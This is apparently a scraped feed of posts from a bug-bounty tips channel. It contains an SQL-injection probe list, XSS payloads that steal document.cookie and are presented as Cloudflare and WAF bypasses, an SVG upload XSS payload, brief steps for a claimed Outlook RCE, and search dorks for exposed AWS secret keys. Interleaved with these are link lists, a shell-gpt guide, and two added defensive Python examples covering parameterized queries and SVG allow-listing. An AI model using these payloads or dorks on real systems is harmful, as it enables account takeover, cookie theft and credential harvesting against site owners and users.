Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist
Admin: @laazy_hack3r

' " "' ' " '" ''' . / \ %5c %27 %22 %23 %3B %27%22%60 %22%27 %27%20%22 %27%22 %27%27%27 ) ") ') )) ")) ')) ))) # ; '' ` , "" // \\ % %00 || 0.or-1%23 'or-1%23 %2F %5C %29 %22%29 %27%29 %29%29 %22%29%29 %27%29%29 %27%27 %60 %60%60 %2C %22%22 %2F%2F %5C%5C %7C%7C 28 % %2A%7C //* %7C 29 % ( */* | %' %" * *)(& *)(|(& *)(|(* *))%00 -'

How do you test for error-based SQL injection? By putting ' " # ; ? in a param? There are lots of methods to test; just use this list and try it in Intruder or any other one-liner, because normally developers block or filter ' " these. If you get any error, try SQLi with ghauri and sqlmap, and manually in Burp, to confirm more..
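Why these probes produce errors, and what removes the error condition entirely, shown as an added example that is not part of the original post. It runs a few probe strings from the list above against a string-concatenated query, a quote-stripping filter of the kind the post mentions, and parameterized queries; the table, function names and the in-memory SQLite database are assumptions made for the demo.

```python
import sqlite3

# Constructed sample: a few probe strings taken from the list in the post.
PROBES = ["'", '"', "')", "''", ")", "\\", "%27"]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    return conn

def by_name_concat(conn, value):
    # Vulnerable: input is pasted into a quoted string literal.
    return conn.execute(f"SELECT id FROM users WHERE name = '{value}'").fetchall()

def by_id_filtered(conn, value):
    # Still vulnerable: stripping ' and " does nothing for a numeric context.
    cleaned = value.replace("'", "").replace('"', "")
    return conn.execute(f"SELECT name FROM users WHERE id = {cleaned}").fetchall()

def by_name_param(conn, value):
    # Hardened: the driver binds the value; it is never parsed as SQL.
    return conn.execute("SELECT id FROM users WHERE name = ?", (value,)).fetchall()

def by_id_param(conn, value):
    # Hardened numeric lookup, same binding mechanism.
    return conn.execute("SELECT name FROM users WHERE id = ?", (value,)).fetchall()

def probes_causing_errors(handler, base):
    """Return the probes that make `handler` raise a database error."""
    conn = make_db()
    failing = []
    for probe in PROBES:
        try:
            handler(conn, base + probe)  # probe appended to a normal value
        except sqlite3.Error:
            failing.append(probe)
    conn.close()
    return failing

if __name__ == "__main__":
    for handler, base in [(by_name_concat, "alice"), (by_id_filtered, "1"),
                          (by_name_param, "alice"), (by_id_param, "1")]:
        print(handler.__name__, probes_causing_errors(handler, base))
```

The quote filter only changes which characters break the statement; the bound-parameter versions raise no database error for any probe.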

18 Websites To Learn Linux For FREE
1. nixCraft
2. Tecmint
3. Linuxize
4. It's FOSS
5. Linux Hint
6. LinuxOPsys
7. Linux Journey
8. Linux Academy
9. Linux Survival
10. Linux Command
11. Ryan's Tutorials
12. Linux Handbook
13. Linux FoundationX
14. LabEx Linux For Noobs
15. Guru99 Linux Tutorial Summary
16. Conquering the command line
17. Intellipat Linux Tutorial for Beginners
18. The Debian Administrators Handbook

(Hard filter+Cloudflare bypassed) Stored XSS leads to account takeover. Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)> Tips: Always play with inputs => reflecting value's tags, even if there is a WAF/Cloudflare. #bugbountytip #bugbounty

Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml"> <foreignObject width="100%" height="100%"> <body xmlns="w3.org/1999/xhtml"> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
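A server-side upload check for the case described above, as an added example that is not part of the original post. Instead of stripping strings, which the post says gets bypassed, it parses the file and accepts only an allow-list of SVG elements; the allow-list, function names and the benign sample are assumptions.

```python
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"
# Assumption: allow-list for static images only; extend deliberately.
ALLOWED = {"svg", "g", "path", "rect", "circle", "ellipse", "line",
           "polyline", "polygon", "title", "desc", "defs"}

# The SVG exactly as quoted in the post (namespaces as they appear there).
POSTED_SVG = b"""<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml"> <foreignObject width="100%" height="100%"> <body xmlns="w3.org/1999/xhtml"> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>"""
# Constructed benign upload.
PLAIN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="9" height="9"/></svg>'

def local(name):
    """Drop the '{namespace}' prefix ElementTree puts on names."""
    return name.rsplit("}", 1)[-1]

def svg_upload_problems(data):
    """Return reasons to reject an uploaded SVG; an empty list means accept."""
    lowered = data.lower()
    # Refuse DTDs up front so entity-expansion tricks never reach the parser.
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return ["DOCTYPE/ENTITY declarations are not accepted"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    problems = []
    for el in root.iter():
        # Element must be in the real SVG namespace and on the allow-list.
        if not el.tag.startswith(SVG_NS) or local(el.tag) not in ALLOWED:
            problems.append(f"element not allowed: {el.tag}")
        for attr, value in el.attrib.items():
            name = local(attr).lower()
            if name.startswith("on"):
                problems.append(f"event handler attribute: {name}")
            elif name in ("href", "src") and not value.strip().startswith("#"):
                problems.append(f"non-local URL in {name}: {value!r}")
    return problems

if __name__ == "__main__":
    print(svg_upload_problems(PLAIN_SVG))
    for reason in svg_upload_problems(POSTED_SVG):
        print(reason)
```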

This is an image on how to identify a template injection.

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well! A br
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well! A brief instruction for red teams: 1. Compile our enhanced DLL; 2. Use NetSPI's ruler and wait! No back connect required! πŸ”₯ πŸ“πŸ“

You can see all the different payloads at https://t.co/A5EjVwBjq1

■■■■■ DEF CON 29 Main Stage Presentations:
1-Babak Javadi, Nick Draffen, Eric Bettse, Anze Jensterle - The PACS man Comes For Us All https://www.youtube.com/watch?v=NARJrwX_KFY
2-Reza Soosahabi, Chuck McAuley - SPARROW: A Novel Covert Communication Scheme https://www.youtube.com/watch?v=oaLIo9HwW-g
3-Tomer Bar, Eran Segal - 2021 Our Journey Back To The Future Of Windows Vulnerabilities https://www.youtube.com/watch?v=VxNi5pVDZU0
4-Sick Codes - The Agricultural Data Arms Race Exploiting a Tractor Load of Vulns https://www.youtube.com/watch?v=zpouLO-GXLo
5-Shir Tamari, Ami Luttwak - New class of DNS Vulns Affecting DNS-as-Service Platforms https://www.youtube.com/watch?v=72uzIZPyVjI
6-Sheila A Berta - The Unbelievable Insecurity of the Big Data Stack https://www.youtube.com/watch?v=vl9hk4fQdos
7-Roy Davis - No Key No PIN No Combo No Problem Pwning ATMs For Fun and Profit https://www.youtube.com/watch?v=9cG-JL0LHYw
8-Rotem Bar - Abusing SAST tools When scanners do more than just scanning https://www.youtube.com/watch?v=Jl-CU6G4Ofc
9-Richard Thieme AKA neuralcowboy - UFOs: Misinformation, Disinfo, and the Basic Truth https://www.youtube.com/watch?v=mExktWB0qz4
10-Richard Henderson - Old MacDonald Had a Barcode, E I E I CAR https://www.youtube.com/watch?v=cIcbAMO6sxo
11-Rex Guo, Junyuan Zeng - Phantom Attack: Evading System Call Monitoring https://www.youtube.com/watch?v=yaAdM8pWKG8
12-Paz Hameiri - TEMPEST Radio Station https://www.youtube.com/watch?v=m9WkEwshNKc
13-Patrick Wardle - Bundles of Joy: Breaking MacOS via Subverted Applications Bundles https://www.youtube.com/watch?v=raSTgFqYaoc
14-PatH - Warping Reality: Creating and Countering the Next Generation of Linux Rootkits https://www.youtube.com/watch?v=g6SKWT7sROQ
15-Orange Tsai - ProxyLogon Just Tip of the Iceberg, New Attack Surface on Exchange Server-@onhex_ir https://www.youtube.com/watch?v=5mqid-7zp8k
16-Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic https://www.youtube.com/watch?v=6AsVUS79gLw
17-Mars Cheng, Selmon Yang - Taking Apart and Taking Over ICS & SCADA Ecosystems https://www.youtube.com/watch?v=L0w_aE4jRFw
18-Laura Abbott, Rick Altherr - Breaking TrustZone M: Privilege Escalation on LPC55S69 https://www.youtube.com/watch?v=eKKgaGbcq4o
19-Justin Perdok - Hi Im DOMAIN Steve, Please Let Me Access VLAN2 https://www.youtube.com/watch?v=lDCoyxIhTN8
20-Jenko Hwong - New Phishing Attacks Exploiting OAuth Authentication Flows https://www.youtube.com/watch?v=9slRYvpKHp4
21-Jeff Dileo - Instrument and Find Out: Parasitic Tracers for High Level Languages https://www.youtube.com/watch?v=Iy1BNywebpY
22-James Kettle - HTTP2: The Sequel is Always Worse https://www.youtube.com/watch?v=rHxVVeM9R-M
23-Jacob Baines - Bring Your Own Print Driver Vulnerability https://www.youtube.com/watch?v=vdesswZYz-8
24-Ian Coldwater, Chad Rikansrud - Real Life Story of the 1st Mainframe Container Breakout https://www.youtube.com/watch?v=7DXF7YDBf-g
25-hyp3ri0n aka Alejandro Caceres Jason Hopper - PunkSPIDER and IOStation: Making a Mess-@onhex_ir https://www.youtube.com/watch?v=DlS_sl4hTWg
26-Hao Xing, Zekai Wu - How I use a JSON 0day to Steal Your Money on the Blockchain https://www.youtube.com/watch?v=pUexrXOGCkE
27-David Dworken - Worming through IDEs https://www.youtube.com/watch?v=pzqu_qaoNuY
28-Cory Doctorow - Privacy Without Monopoly https://www.youtube.com/watch?v=deRRR5B1hwI
29-Christopher Wade - Breaking Secure Bootloaders https://www.youtube.com/watch?v=z4gIxdFfJDg
30-Chad Seaman - UPnProxyPot: Fake the Funk, Become a Blackhat Proxy, MITM their TLS... https://www.youtube.com/watch?v=mHCGNUsrTf0
31-Brian Hong - Sleight of ARM: Demystifying Intel Houdini https://www.youtube.com/watch?v=9oQ5XjA1aq0
32-Bill Graydon - Defeating Physical Intrusion Detection Alarm Wires https://www.youtube.com/watch?v=Liz9R_QxSgk
33-Ben Kurtz - Offensive Golang Bonanza: Writing Golang Malware https://www.youtube.com/watch?v=3RQb05ITSyk

Ffuf Guide

#Offensive_security Lord Of The Ring0
Part 1 - Introduction: https://idov31.github.io/posts/lord-of-the-ring0-p1
Part 2 - A tale of routines, IOCTLs and IRPs: https://idov31.github.io/posts/lord-of-the-ring0-p2
Part 3 - Sailing to the land of the user: https://idov31.github.io/posts/lord-of-the-ring0-p3
Part 4 - The call back home: https://idov31.github.io/posts/lord-of-the-ring0-p4
Part 5 - Saruman's Manipulation: https://idov31.github.io/posts/lord-of-the-ring0-p5
Part 6 - Conclusion: https://idov31.github.io/posts/lord-of-the-ring0-p6

AWS OSINT by Dorking 🎩
=Shodan Dorks
html:"AWS_ACCESS_KEY_ID" html:"AWS_SECRET_ACCESS_KEY" html:"AWS_SESSION_TOKEN" title:"AWS S3 Explorer" html:"AWS Elastic Beanstalk overview" html:"OpenSearch Dashboards" "X-Amz-Server-Side-Encryption" title:"EC2 Instance Information" http.title:"Amazon Cognito Developer Authentication Sample" "Server: EC2ws" title:"AWS X-Ray Sample Application" html:"Amazon EC2 Status" html:"AWS EC2 Auto Scaling Lab" html:"istBucketResult"
=Search Engine Dorks
site:.s3.amazonaws.com "Company" site:http://s3.amazonaws.com intitle:index.of.bucket “” site:s3.amazonaws.com "index of /" s3 site:amazonaws.com filetype:xls password inurl:gitlab "AWS_SECRET_KEY" inurl:pastebin "AWS_ACCESS_KEY" inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
=Github Dorks
Key:amazon_secret_access_key amazonaws aws_access aws_access_key_id aws_bucket aws_key aws_secret aws_secret_key aws_token bucket_password bucketeer_aws_access_key_id bucketeer_aws_secret_access_key cache_s3_secret_key cloud_watch_aws_access_key filename:credentials aws_access_key_id filename:s3cfg lottie_s3_api_key lottie_s3_secret_key rds.amazonaws.com password s3_access_key s3_access_key_id s3_key s3_key_app_logs s3_key_assets s3_secret_key sandbox_aws_access_key_id sandbox_aws_secret_access_key secret_key eureka.aws secretkey filename:.bash_profile aws filename:.s3cfg

Integrating GPT Into Command Line :- by @devil_anon
This would be a text-based guide because making a video about this would be too short and unnecessary.
1. Install shell-gpt and jq. For Debian users :-
sudo apt install jq
For Arch users :-
sudo pacman -S jq
Next :-
pip install shell-gpt
2. Type sgpt into your terminal, then input your API key from your profile after signing up at openai.com
3. Usage. To ask simple question prompts, use
sgpt "your question here"
then press Enter (make sure the question is in quotes). For a guide on tool usage, use:
sgpt --chat toolname --shell "question here regarding the tool in order to bring up a command"
Example:
sgpt --chat nmap --shell "what's the command to scan ip 10.76.xx.xx and enumerate all protocols running on it"
sgpt would then return a command regarding what you asked.